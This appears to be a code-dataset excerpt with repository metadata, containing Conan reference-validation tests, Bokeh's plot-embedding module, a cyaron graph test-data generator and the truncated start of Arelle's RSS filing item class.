with six.assertRaisesRegex(self, InvalidNameException, "is not a string"):
ConanName.validate_name(value)
def test_validate_name(self):
self.assertIsNone(ConanName.validate_name("string.dot.under-score.123"))
self.assertIsNone(ConanName.validate_name("_underscore+123"))
self.assertIsNone(ConanName.validate_name("*"))
self.assertIsNone(ConanName.validate_name("a" * ConanName._min_chars))
self.assertIsNone(ConanName.validate_name("a" * ConanName._max_chars))
self.assertIsNone(ConanName.validate_name("a" * 50)) # Regression test
def test_validate_name_invalid_format(self):
self._check_invalid_format("-no.dash.start")
self._check_invalid_format("a" * (ConanName._min_chars - 1))
self._check_invalid_format("a" * (ConanName._max_chars + 1))
def test_validate_name_invalid_type(self):
self._check_invalid_type(123.34)
self._check_invalid_type(("item1", "item2",))
def test_validate_name_version(self):
self.assertIsNone(ConanName.validate_version("name", "[vvvv]"))
def test_validate_name_version_invalid(self):
self._check_invalid_version("name", "[no.close.bracket")
self._check_invalid_version("name", "no.open.bracket]")
class CheckValidRefTest(unittest.TestCase):
def test_string(self):
self.assertTrue(check_valid_ref("package/1.0@user/channel"))
self.assertTrue(check_valid_ref("package/1.0@user/channel"))
self.assertTrue(check_valid_ref("package/[*]@user/channel"))
self.assertTrue(check_valid_ref("package/[>1.0]@user/channel"))
self.assertTrue(check_valid_ref("package/[1.*]@user/channel"))
# Patterns are invalid
self.assertFalse(check_valid_ref("package/*@user/channel"))
self.assertFalse(check_valid_ref("package/1.0@user/*"))
self.assertFalse(check_valid_ref("package/1.0@user/chan*"))
self.assertFalse(check_valid_ref("package/[>1.0]@user/chan*"))
self.assertFalse(check_valid_ref("*/1.0@user/channel"))
self.assertFalse(check_valid_ref("package*/1.0@user/channel"))
# * pattern is valid in non stric_mode
self.assertTrue(check_valid_ref("package/*@user/channel", strict_mode=False))
self.assertTrue(check_valid_ref("package/*@user/*", strict_mode=False))
# But other patterns are not valid in non stric_mode
self.assertFalse(check_valid_ref("package/1.0@user/chan*", strict_mode=False))
def test_incomplete_refs(self):
self.assertTrue(check_valid_ref("package/1.0", strict_mode=False))
self.assertFalse(check_valid_ref("package/1.0"))
self.assertFalse(check_valid_ref("package/1.0@user"))
self.assertFalse(check_valid_ref("package/1.0@/channel"))
self.assertFalse(check_valid_ref("lib@#rev"))
class GetReferenceFieldsTest(unittest.TestCase):
def test_fields_complete(self):
# No matter if we say we allow partial references for "user/channel", if we
# provide this patterns everything is parsed correctly
for user_channel_input in [True, False]:
tmp = get_reference_fields("lib/1.0@user", user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", "1.0", "user", None, None))
tmp = get_reference_fields("lib/1.0@/channel", user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", "1.0", None, "channel", None))
# FIXME: 2.0 in this case lib is considered the version, weird.
tmp = get_reference_fields("lib@#rev", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, "lib", None, None, "rev"))
# FIXME: 2.0 in this case lib is considered the version, weird.
tmp = get_reference_fields("lib@/channel#rev", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, "lib", None, "channel", "rev"))
tmp = get_reference_fields("/1.0@user/#rev", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, "1.0", "user", None, "rev"))
tmp = get_reference_fields("/@/#", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, None, None, None, None))
tmp = get_reference_fields("lib/1.0@/", user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", "1.0", None, None, None))
tmp = get_reference_fields("lib/1.0@", user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", "1.0", None, None, None))
tmp = get_reference_fields("lib/@", user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", None, None, None, None))
tmp = get_reference_fields("/@", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, None, None, None, None))
tmp = get_reference_fields("@", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, None, None, None, None))
tmp = get_reference_fields("lib/1.0@user/channel#rev",
user_channel_input=user_channel_input)
self.assertEqual(tmp, ("lib", "1.0", "user", "channel", "rev"))
# FIXME: 2.0 in this case lib is considered the version, weird.
tmp = get_reference_fields("lib@user/channel", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, "lib", "user", "channel", None))
tmp = get_reference_fields("/@/#", user_channel_input=user_channel_input)
self.assertEqual(tmp, (None, None, None, None, None))
def test_only_user_channel(self):
tmp = get_reference_fields("user/channel", user_channel_input=True)
self.assertEqual(tmp, (None, None, "user", "channel", None))
tmp = get_reference_fields("user", user_channel_input=True)
self.assertEqual(tmp, (None, None, "user", None, None))
tmp = get_reference_fields("/channel", user_channel_input=True)
self.assertEqual(tmp, (None, None, None, "channel", None))
ref_pattern = ConanFileReference.loads("package/*@user/channel")
self.assertFalse(check_valid_ref(ref_pattern, strict_mode=False))
class CompatiblePrefTest(unittest.TestCase):
def test_compatible(self):
def ok(pref1, pref2):
pref1 = PackageReference.loads(pref1)
pref2 = PackageReference.loads(pref2)
return pref1.is_compatible_with(pref2)
# Same ref is ok
self.assertTrue(ok("package/1.0@user/channel#RREV1:packageid1#PREV1",
"package/1.0@user/channel#RREV1:packageid1#PREV1"))
# Change PREV is not ok
self.assertFalse(ok("package/1.0@user/channel#RREV1:packageid1#PREV1",
"package/1.0@user/channel#RREV1:packageid1#PREV2"))
# Different ref is not ok
self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1#PREV1",
"packageB/1.0@user/channel#RREV1:packageid1#PREV1"))
# Different ref is not ok
self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1",
"packageB/1.0@user/channel#RREV1:packageid1#PREV1"))
# Different package_id is not ok
self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1",
"packageA/1.0@user/channel#RREV1:packageid2#PREV1"))
# Completed PREV is ok
self.assertTrue(ok("packageA/1.0@user/channel#RREV1:packageid1",
"packageA/1.0@user/channel#RREV1:packageid1#PREV1"))
# But only in order, the second ref cannot remove PREV
self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1#PREV1",
"packageA/1.0@user/channel#RREV1:packageid1"))
# Completing RREV is also OK
self.assertTrue(ok("packageA/1.0@user/channel:packageid1",
"packageA/1.0@user/channel#RREV1:packageid1"))
# Completing RREV and PREV is also OK
self.assertTrue(ok("packageA/1.0@user/channel:packageid1",
"packageA/1.0@user/channel#RREV:packageid1#PREV"))
| 47.94198 | 101 | 0.663202 |
faf68bce84dcda80469d955f8ac519566876f05c | 28,403 | py | Python | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | ''' Provide functions to embed Bokeh models (e.g., plots, widget, layouts)
in various different ways.
There are a number of different combinations of options when embedding
Bokeh plots. The data for the plot can be contained in the document,
or on a Bokeh server, or in a sidecar JavaScript file. Likewise, BokehJS
may be inlined in the document, or loaded from CDN or a Bokeh server.
The functions in ``bokeh.embed`` provide functionality to embed in all
these different cases.
'''
from __future__ import absolute_import
from contextlib import contextmanager
from collections import Sequence
from warnings import warn
import re
from six import string_types
from six.moves.urllib.parse import urlparse
from .core.templates import (
AUTOLOAD_JS, AUTOLOAD_NB_JS, AUTOLOAD_TAG,
FILE, NOTEBOOK_DIV, PLOT_DIV, DOC_JS, SCRIPT_TAG
)
from .core.json_encoder import serialize_json
from .document import Document, DEFAULT_TITLE
from .model import Model
from .resources import BaseResources, DEFAULT_SERVER_HTTP_URL, _SessionCoordinates
from .settings import settings
from .util.deprecation import deprecated
from .util.string import encode_utf8, format_docstring
from .util.serialization import make_id
from .util.compiler import bundle_all_models
def _indent(text, n=2):
return "\n".join([ " "*n + line for line in text.split("\n") ])
def _wrap_in_safely(code):
return """\
Bokeh.safely(function() {
%(code)s
});""" % dict(code=_indent(code, 2))
def _wrap_in_onload(code):
return """\
(function() {
var fn = function() {
%(code)s
};
if (document.readyState != "loading") fn();
else document.addEventListener("DOMContentLoaded", fn);
})();
""" % dict(code=_indent(code, 4))
def _wrap_in_script_tag(js):
return SCRIPT_TAG.render(js_code=js)
@contextmanager
def _ModelInDocument(models, apply_theme=None):
doc = _find_existing_docs(models)
old_theme = doc.theme
if apply_theme is FromCurdoc:
from .io import curdoc; curdoc
doc.theme = curdoc().theme
elif apply_theme is not None:
doc.theme = apply_theme
models_to_dedoc = _add_doc_to_models(doc, models)
yield models
for model in models_to_dedoc:
doc.remove_root(model, apply_theme)
doc.theme = old_theme
@contextmanager
def _ModelInEmptyDocument(model, apply_theme=None):
from .document import Document
doc = _find_existing_docs([model])
if apply_theme is FromCurdoc:
from .io import curdoc; curdoc
doc.theme = curdoc().theme
elif apply_theme is not None:
doc.theme = apply_theme
model._document = None
for ref in model.references():
ref._document = None
empty_doc = Document()
empty_doc.add_root(model)
yield model
model._document = doc
for ref in model.references():
ref._document = doc
def _find_existing_docs(models):
existing_docs = set(m if isinstance(m, Document) else m.document for m in models)
existing_docs.discard(None)
if len(existing_docs) == 0:
# no existing docs, use the current doc
doc = Document()
elif len(existing_docs) == 1:
# all existing docs are the same, use that one
doc = existing_docs.pop()
else:
# conflicting/multiple docs, raise an error
msg = ('Multiple items in models contain documents or are '
'themselves documents. (Models must be owned by only a '
'single document). This may indicate a usage error.')
raise RuntimeError(msg)
return doc
def _add_doc_to_models(doc, models):
models_to_dedoc = []
for model in models:
if isinstance(model, Model):
if model.document is None:
try:
doc.add_root(model)
models_to_dedoc.append(model)
except RuntimeError as e:
child = re.search('\((.*)\)', str(e)).group(0)
msg = ('Sub-model {0} of the root model {1} is already owned '
'by another document (Models must be owned by only a '
'single document). This may indicate a usage '
'error.'.format(child, model))
raise RuntimeError(msg)
return models_to_dedoc
class FromCurdoc: pass
def components(models, wrap_script=True, wrap_plot_info=True, theme=FromCurdoc):
'''
Return HTML components to embed a Bokeh plot. The data for the plot is
stored directly in the returned HTML.
An example can be found in examples/embed/embed_multiple.py
.. note::
The returned components assume that BokehJS resources are
**already loaded**.
Args:
models (Model|list|dict|tuple) :
A single Model, a list/tuple of Models, or a dictionary of keys and Models.
wrap_script (boolean, optional) :
If True, the returned javascript is wrapped in a script tag.
(default: True)
wrap_plot_info (boolean, optional) : If True, returns ``<div>`` strings.
Otherwise, return dicts that can be used to build your own divs.
(default: True)
If False, the returned dictionary contains the following information:
.. code-block:: python
{
'modelid': 'The model ID, used with Document.get_model_by_id',
'elementid': 'The css identifier the BokehJS will look for to target the plot',
'docid': 'Used by Bokeh to find the doc embedded in the returned script',
}
theme (Theme, optional) :
Defaults to the ``Theme`` instance in the current document.
Setting this to ``None`` uses the default theme or the theme
already specified in the document. Any other value must be an
instance of the ``Theme`` class.
Returns:
UTF-8 encoded *(script, div[s])* or *(raw_script, plot_info[s])*
Examples:
With default wrapping parameter values:
.. code-block:: python
components(plot)
# => (script, plot_div)
components((plot1, plot2))
# => (script, (plot1_div, plot2_div))
components({"Plot 1": plot1, "Plot 2": plot2})
# => (script, {"Plot 1": plot1_div, "Plot 2": plot2_div})
Examples:
With wrapping parameters set to ``False``:
.. code-block:: python
components(plot, wrap_script=False, wrap_plot_info=False)
# => (javascript, plot_dict)
components((plot1, plot2), wrap_script=False, wrap_plot_info=False)
# => (javascript, (plot1_dict, plot2_dict))
components({"Plot 1": plot1, "Plot 2": plot2}, wrap_script=False, wrap_plot_info=False)
# => (javascript, {"Plot 1": plot1_dict, "Plot 2": plot2_dict})
'''
# 1) Convert single items and dicts into list
was_single_object = isinstance(models, Model) or isinstance(models, Document)
# converts single to list
models = _check_models(models, allow_dict=True)
# now convert dict to list, saving keys in the same order
model_keys = None
if isinstance(models, dict):
model_keys = models.keys()
values = []
# don't just use .values() to ensure we are in the same order as key list
for k in model_keys:
values.append(models[k])
models = values
# 2) Append models to one document. Either pre-existing or new and render
with _ModelInDocument(models, apply_theme=theme):
(docs_json, render_items) = _standalone_docs_json_and_render_items(models)
script = bundle_all_models()
script += _script_for_render_items(docs_json, render_items)
if wrap_script:
script = _wrap_in_script_tag(script)
script = encode_utf8(script)
if wrap_plot_info:
results = list(_div_for_render_item(item) for item in render_items)
else:
results = render_items
# 3) convert back to the input shape
if was_single_object:
return script, results[0]
elif model_keys is not None:
result = {}
for (key, value) in zip(model_keys, results):
result[key] = value
return script, result
else:
return script, tuple(results)
def _use_widgets(objs):
from .models.widgets import Widget
def _needs_widgets(obj):
return isinstance(obj, Widget)
for obj in objs:
if isinstance(obj, Document):
if _use_widgets(obj.roots):
return True
else:
if any(_needs_widgets(ref) for ref in obj.references()):
return True
else:
return False
def _use_gl(objs):
from .models.plots import Plot
def _needs_gl(obj):
return isinstance(obj, Plot) and obj.webgl
for obj in objs:
if isinstance(obj, Document):
if _use_gl(obj.roots):
return True
else:
if any(_needs_gl(ref) for ref in obj.references()):
return True
else:
return False
def _bundle_for_objs_and_resources(objs, resources):
if isinstance(resources, BaseResources):
js_resources = css_resources = resources
elif isinstance(resources, tuple) and len(resources) == 2 and all(r is None or isinstance(r, BaseResources) for r in resources):
js_resources, css_resources = resources
if js_resources and not css_resources:
warn('No Bokeh CSS Resources provided to template. If required you will need to provide them manually.')
if css_resources and not js_resources:
warn('No Bokeh JS Resources provided to template. If required you will need to provide them manually.')
else:
raise ValueError("expected Resources or a pair of optional Resources, got %r" % resources)
from copy import deepcopy
# XXX: force all components on server and in notebook, because we don't know in advance what will be used
use_widgets = _use_widgets(objs) if objs else True
use_gl = _use_gl(objs) if objs else True
if js_resources:
js_resources = deepcopy(js_resources)
if not use_widgets and "bokeh-widgets" in js_resources.components:
js_resources.components.remove("bokeh-widgets")
if use_gl and "bokeh-gl" not in js_resources.components:
js_resources.components.append("bokeh-gl")
bokeh_js = js_resources.render_js()
else:
bokeh_js = None
if css_resources:
css_resources = deepcopy(css_resources)
if not use_widgets and "bokeh-widgets" in css_resources.components:
css_resources.components.remove("bokeh-widgets")
bokeh_css = css_resources.render_css()
else:
bokeh_css = None
return bokeh_js, bokeh_css
def notebook_div(model, notebook_comms_target=None, theme=FromCurdoc):
''' Return HTML for a div that will display a Bokeh plot in a
Jupyter/Zeppelin Notebook. notebook_comms_target is only supported
in Jupyter for now.
The data for the plot is stored directly in the returned HTML.
Args:
model (Model) : Bokeh object to render
notebook_comms_target (str, optional) :
A target name for a Jupyter Comms object that can update
the document that is rendered to this notebook div
theme (Theme, optional) :
Defaults to the ``Theme`` instance in the current document.
Setting this to ``None`` uses the default theme or the theme
already specified in the document. Any other value must be an
instance of the ``Theme`` class.
Returns:
UTF-8 encoded HTML text for a ``<div>``
.. note::
Assumes :func:`~bokeh.util.notebook.load_notebook` or the equivalent
has already been executed.
'''
model = _check_one_model(model)
# Append models to one document. Either pre-existing or new and render
with _ModelInEmptyDocument(model, apply_theme=theme):
(docs_json, render_items) = _standalone_docs_json_and_render_items([model])
item = render_items[0]
if notebook_comms_target:
item['notebook_comms_target'] = notebook_comms_target
else:
notebook_comms_target = ''
script = _wrap_in_onload(DOC_JS.render(
docs_json=serialize_json(docs_json),
render_items=serialize_json(render_items)
))
js = AUTOLOAD_NB_JS.render(
comms_target = notebook_comms_target,
js_urls = [],
css_urls = [],
js_raw = [script],
css_raw = "",
elementid = item['elementid']
)
div = _div_for_render_item(item)
html = NOTEBOOK_DIV.render(
plot_script = js,
plot_div = div,
)
return encode_utf8(html)
def file_html(models,
resources,
title=None,
template=FILE,
template_variables={}):
''' Return an HTML document that embeds Bokeh Model or Document objects.
The data for the plot is stored directly in the returned HTML, with
support for customizing the JS/CSS resources independently and
customizing the jinja2 template.
Args:
models (Model or Document or list) : Bokeh object or objects to render
typically a Model or Document
resources (Resources or tuple(JSResources or None, CSSResources or None)) : a resource configuration for Bokeh JS & CSS assets.
title (str, optional) : a title for the HTML document ``<title>`` tags or None. (default: None)
If None, attempt to automatically find the Document title from the given plot objects.
template (Template, optional) : HTML document template (default: FILE)
A Jinja2 Template, see bokeh.core.templates.FILE for the required
template parameters
template_variables (dict, optional) : variables to be used in the Jinja2
template. If used, the following variable names will be overwritten:
title, bokeh_js, bokeh_css, plot_script, plot_div
Returns:
UTF-8 encoded HTML
'''
models = _check_models(models)
with _ModelInDocument(models):
(docs_json, render_items) = _standalone_docs_json_and_render_items(models)
title = _title_from_models(models, title)
bundle = _bundle_for_objs_and_resources(models, resources)
return _html_page_for_render_items(bundle, docs_json, render_items, title=title,
template=template, template_variables=template_variables)
# TODO rename this "standalone"?
def autoload_static(model, resources, script_path):
''' Return JavaScript code and a script tag that can be used to embed
Bokeh Plots.
The data for the plot is stored directly in the returned JavaScript code.
Args:
model (Model or Document) :
resources (Resources) :
script_path (str) :
Returns:
(js, tag) :
JavaScript code to be saved at ``script_path`` and a ``<script>``
tag to load it
Raises:
ValueError
'''
# TODO: maybe warn that it's not exactly useful, but technically possible
# if resources.mode == 'inline':
# raise ValueError("autoload_static() requires non-inline resources")
model = _check_one_model(model)
with _ModelInDocument([model]):
(docs_json, render_items) = _standalone_docs_json_and_render_items([model])
bundle = bundle_all_models()
script = _script_for_render_items(docs_json, render_items)
item = render_items[0]
js = _wrap_in_onload(AUTOLOAD_JS.render(
js_urls = resources.js_files,
css_urls = resources.css_files,
js_raw = resources.js_raw + [bundle, script],
css_raw = resources.css_raw_str,
elementid = item['elementid'],
))
tag = AUTOLOAD_TAG.render(
src_path = script_path,
elementid = item['elementid'],
modelid = item.get('modelid', ''),
docid = item.get('docid', ''),
)
return encode_utf8(js), encode_utf8(tag)
def autoload_server(model=None, app_path=None, session_id=None, url="default", relative_urls=False):
''' Return a script tag that embeds content from a Bokeh server session.
Bokeh apps embedded using ``autoload_server`` will NOT set the browser
window title.
.. note::
Typically you will not want to save or re-use the output of this
function for different or multiple page loads.
Args:
model (Model, optional) : The object to render from the session
If ``None`` an entire document is rendered. (default: ``None``)
If you supply a specific model to render, you must also supply the
session ID containing that model.
Supplying a model is usually only useful when embedding
a specific session that was previously created using the
``bokeh.client`` API.
session_id (str, optional) : A server session ID (default: None)
If ``None``, let the server auto-generate a random session ID.
Supplying a session id is usually only useful when embedding
a specific session that was previously created using the
``bokeh.client`` API.
url (str, optional) : A URL to a Bokeh application on a Bokeh server
If ``None`` the default URL ``{DEFAULT_SERVER_HTTP_URL}`` will be used.
relative_urls (bool, optional) :
Whether to use relative URLs for resources.
If ``True`` the links generated for resources such a BokehJS
JavaScript and CSS will be relative links.
This should normally be set to ``False``, but must be set to
``True`` in situations where only relative URLs will work. E.g.
when running the Bokeh behind reverse-proxies under certain
configurations
Returns:
A ``<script>`` tag that will execute an autoload script loaded
from the Bokeh Server.
Examples:
In the simplest and most common case, we wish to embed Bokeh server
application by providing the URL to where it is located.
Suppose the app is running (perhaps behind Nginx or some other proxy)
at ``http://app.server.org/foo/myapp``. We wish to embed this app in
a page at ``mysite.com``. The following will provide an HTML script
tag to do that, that can be included in ``mysite.com``:
.. code-block:: python
script = autoload_server(url="http://app.server.org/foo/myapp")
Note that in order for this embedding to work, the Bokeh server needs
to have been configured to allow connections from the public URL where
the embedding happens. In this case, if the autoload script is run from
a page located at ``http://mysite.com/report`` then the Bokeh server
must have been started with an ``--allow-websocket-origin`` option
specifically allowing websocket connections from pages that originate
from ``mysite.com``:
.. code-block:: sh
bokeh serve mayapp.py --allow-websocket-origin=mysite.com
If an autoload script runs from an origin that has not been allowed,
the Bokeh server will return a 403 error.
It's also possible to initiate sessions on a Bokeh server from
Python, using the functions :func:`~bokeh.client.push_session` and
:func:`~bokeh.client.push_session`. This can be useful in advanced
situations where you may want to "set up" the session before you
embed it. For example, you might to load up a session and modify
``session.document`` in some way (perhaps adding per-user data).
In such cases you will pass the session id as an argument as well:
.. code-block:: python
script = autoload_server(session_id="some_session_id",
url="http://app.server.org/foo/myapp")
.. warning::
It is typically a bad idea to re-use the same ``session_id`` for
every page load. This is likely to create scalability and security
problems, and will cause "shared Google doc" behaviour, which is
typically not desired.
'''
if app_path is not None:
deprecated((0, 12, 5), "app_path", "url", "Now pass entire app URLS in the url arguments, e.g. 'url=http://foo.com:5010/bar/myapp'")
if not app_path.startswith("/"):
app_path = "/" + app_path
url = url + app_path
coords = _SessionCoordinates(url=url, session_id=session_id)
elementid = make_id()
# empty model_id means render the entire doc from session_id
model_id = ""
if model is not None:
model_id = model._id
if model_id and session_id is None:
raise ValueError("A specific model was passed to autoload_server() but no session_id; "
"this doesn't work because the server will generate a fresh session "
"which won't have the model in it.")
src_path = coords.url + "/autoload.js?bokeh-autoload-element=" + elementid
if url != "default":
app_path = urlparse(url).path.rstrip("/")
if not app_path.startswith("/"):
app_path = "/" + app_path
src_path += "&bokeh-app-path=" + app_path
if not relative_urls:
src_path += "&bokeh-absolute-url=" + coords.url
# we want the server to generate the ID, so the autoload script
# can be embedded in a static page while every user still gets
# their own session. So we omit bokeh-session-id rather than
# using a generated ID.
if coords.session_id_allowing_none is not None:
src_path = src_path + "&bokeh-session-id=" + session_id
tag = AUTOLOAD_TAG.render(
src_path = src_path,
app_path = app_path,
elementid = elementid,
modelid = model_id,
)
return encode_utf8(tag)
autoload_server.__doc__ = format_docstring(autoload_server.__doc__, DEFAULT_SERVER_HTTP_URL=DEFAULT_SERVER_HTTP_URL)
def _script_for_render_items(docs_json, render_items, app_path=None, absolute_url=None):
js = DOC_JS.render(
docs_json=serialize_json(docs_json),
render_items=serialize_json(render_items),
app_path=app_path,
absolute_url=absolute_url,
)
if not settings.dev:
js = _wrap_in_safely(js)
return _wrap_in_onload(js)
def _html_page_for_render_items(bundle, docs_json, render_items, title,
template=FILE, template_variables={}):
if title is None:
title = DEFAULT_TITLE
bokeh_js, bokeh_css = bundle
script = bundle_all_models()
script += _script_for_render_items(docs_json, render_items)
template_variables_full = template_variables.copy()
template_variables_full.update(dict(
title = title,
bokeh_js = bokeh_js,
bokeh_css = bokeh_css,
plot_script = _wrap_in_script_tag(script),
plot_div = "\n".join(_div_for_render_item(item) for item in render_items)
))
html = template.render(template_variables_full)
return encode_utf8(html)
def _check_models(models, allow_dict=False):
input_type_valid = False
# Check for single item
if isinstance(models, (Model, Document)):
models = [models]
# Check for sequence
if isinstance(models, Sequence) and all(isinstance(x, (Model, Document)) for x in models):
input_type_valid = True
if allow_dict:
if isinstance(models, dict) and \
all(isinstance(x, string_types) for x in models.keys()) and \
all(isinstance(x, (Model, Document)) for x in models.values()):
input_type_valid = True
if not input_type_valid:
if allow_dict:
raise ValueError(
'Input must be a Model, a Document, a Sequence of Models and Document, or a dictionary from string to Model and Document'
)
else:
raise ValueError('Input must be a Model, a Document, or a Sequence of Models and Document')
return models
def _check_one_model(model):
models = _check_models(model)
if len(models) != 1:
raise ValueError("Input must be exactly one Model or Document")
return models[0]
def _div_for_render_item(item):
return PLOT_DIV.render(elementid=item['elementid'])
# come up with our best title
def _title_from_models(models, title):
# use override title
if title is not None:
return title
# use title from any listed document
for p in models:
if isinstance(p, Document):
return p.title
# use title from any model's document
for p in models:
if p.document is not None:
return p.document.title
# use default title
return DEFAULT_TITLE
def _standalone_docs_json_and_render_items(models):
models = _check_models(models)
render_items = []
docs_by_id = {}
for p in models:
modelid = None
if isinstance(p, Document):
doc = p
else:
if p.document is None:
raise ValueError("To render a Model as HTML it must be part of a Document")
doc = p.document
modelid = p._id
docid = None
for key in docs_by_id:
if docs_by_id[key] == doc:
docid = key
if docid is None:
docid = make_id()
docs_by_id[docid] = doc
elementid = make_id()
render_items.append({
'docid' : docid,
'elementid' : elementid,
# if modelid is None, that means the entire document
'modelid' : modelid
})
docs_json = {}
for k, v in docs_by_id.items():
docs_json[k] = v.to_json()
return (docs_json, render_items)
# TODO this is a theory about what file_html() "should" be,
# with a more explicit name similar to the server names below,
# and without the jinja2 entanglement. Thus this encapsulates that
# we use jinja2 and encapsulates the exact template variables we require.
# Anyway, we should deprecate file_html or else drop this version,
# most likely.
def standalone_html_page_for_models(models, resources, title):
''' Return an HTML document that renders zero or more Bokeh documents or models.
The document for each model will be embedded directly in the HTML, so the
resulting HTML file is standalone (does not require a server). Depending
on the provided resources, the HTML file may be completely self-contained
or may have to load JS and CSS from different files.
Args:
models (Model or Document) : Bokeh object to render
typically a Model or a Document
resources (Resources) : a resource configuration for BokehJS assets
title (str) : a title for the HTML document ``<title>`` tags or None to use the document title
Returns:
UTF-8 encoded HTML
'''
deprecated((0, 12, 5), 'bokeh.io.standalone_html_page_for_models', 'bokeh.io.file_html')
return file_html(models, resources, title)
def server_html_page_for_models(session_id, model_ids, resources, title, template=FILE):
render_items = []
for modelid in model_ids:
if modelid is None:
raise ValueError("None found in list of model_ids")
elementid = make_id()
render_items.append({
'sessionid' : session_id,
'elementid' : elementid,
'modelid' : modelid
})
bundle = _bundle_for_objs_and_resources(None, resources)
return _html_page_for_render_items(bundle, {}, render_items, title, template=template)
def server_html_page_for_session(session_id, resources, title, template=FILE, template_variables=None):
elementid = make_id()
render_items = [{
'sessionid' : session_id,
'elementid' : elementid,
'use_for_title' : True
# no 'modelid' implies the entire session document
}]
if template_variables is None:
template_variables = {}
bundle = _bundle_for_objs_and_resources(None, resources)
return _html_page_for_render_items(bundle, dict(), render_items, title, template=template, template_variables=template_variables)
| 35.152228 | 140 | 0.651903 |
53e36e4915954eeb17840b010d2f344e584923d3 | 720 | py | Python | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | 1 | 2021-12-14T08:54:11.000Z | 2021-12-14T08:54:11.000Z | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | null | null | null | E5-D/generator.py | Matrix53/algo | 7a176dac9ed9c6ad65d1514afb6388f7ee6b912a | [
"MIT"
] | 1 | 2021-12-13T09:31:40.000Z | 2021-12-13T09:31:40.000Z | from cyaron import *
code_path = 'D:/Workspace/algo/E5-B/'
# big data
io = IO('1.in', '1.out')
io.input_writeln(500, 1000, 250000)
graph = Graph.graph(500, 1000, directed=True, weight_limit=(0, 10000000))
io.input_writeln(graph.to_str(shuffle=True))
for u in range(1, 501):
for v in range(1, 501):
io.input_writeln(u, v)
io.output_gen(code_path + 'standard.exe')
io.close()
# big data
io = IO('2.in', '2.out')
io.input_writeln(500, 250000, 250000)
graph = Graph.graph(500, 250000, directed=True, weight_limit=(0, 10000000))
io.input_writeln(graph.to_str(shuffle=True))
for u in range(1, 501):
for v in range(1, 501):
io.input_writeln(u, v)
io.output_gen(code_path + 'standard.exe')
io.close()
| 27.692308 | 75 | 0.686111 |
4c170c1c02b9668700198082b53626d504ad085e | 8,016 | py | Python | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 292 | 2015-01-27T03:31:51.000Z | 2022-03-26T07:00:05.000Z | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 94 | 2015-04-18T23:03:00.000Z | 2022-03-28T17:24:55.000Z | arelle/ModelRssItem.py | hamscher/Arelle | 64c1beddcc7163e571011faf07a03d8ffe18bb78 | [
"Apache-2.0"
] | 200 | 2015-01-13T03:55:47.000Z | 2022-03-29T12:38:56.000Z | '''
Created on Nov 11, 2010
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
import os
from arelle import XmlUtil
from arelle.ModelObject import ModelObject
newRssWatchOptions = {
"feedSource": "",
"feedSourceUri": None,
"matchTextExpr": "",
"formulaFileUri": "",
"logFileUri": "",
"emailAddress": "",
"validateXbrlRules": False,
"validateDisclosureSystemRules": False,
"validateCalcLinkbase": False,
"validateFormulaAssertions": False,
"alertMatchedFactText": False,
"alertAssertionUnsuccessful": False,
"alertValiditionError": False,
"latestPubDate": None,
}
# Note: if adding to this list keep DialogRssWatch in sync
class ModelRssItem(ModelObject):
def init(self, modelDocument):
super(ModelRssItem, self).init(modelDocument)
try:
if (self.modelXbrl.modelManager.rssWatchOptions.latestPubDate and
self.pubDate <= self.modelXbrl.modelManager.rssWatchOptions.latestPubDate):
self.status = _("tested")
else:
self.status = _("not tested")
except AttributeError:
self.status = _("not tested")
self.results = None
self.assertions = None
# find edgar namespace
self.edgr = None
for elt in self.iterdescendants("{*}xbrlFiling"):
self.edgr = elt.qname.namespaceURI
break
if self.edgr:
edgrPrefix = "{" + self.edgr + "}"
else:
edgrPrefix = ""
self.edgrDescription = edgrPrefix + "description"
self.edgrFile = edgrPrefix + "file"
self.edgrInlineXBRL = edgrPrefix + "inlineXBRL"
self.edgrSequence = edgrPrefix + "sequence"
self.edgrType = edgrPrefix + "type"
self.edgrUrl = edgrPrefix + "url"
@property
def cikNumber(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "cikNumber"))
@property
def accessionNumber(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "accessionNumber"))
@property
def fileNumber(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "fileNumber"))
@property
def companyName(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "companyName"))
@property
def formType(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "formType"))
@property
def pubDate(self):
try:
return self._pubDate
except AttributeError:
from arelle.UrlUtil import parseRfcDatetime
self._pubDate = parseRfcDatetime(XmlUtil.text(XmlUtil.descendant(self, None, "pubDate")))
return self._pubDate
@property
def filingDate(self):
try:
return self._filingDate
except AttributeError:
import datetime
self._filingDate = None
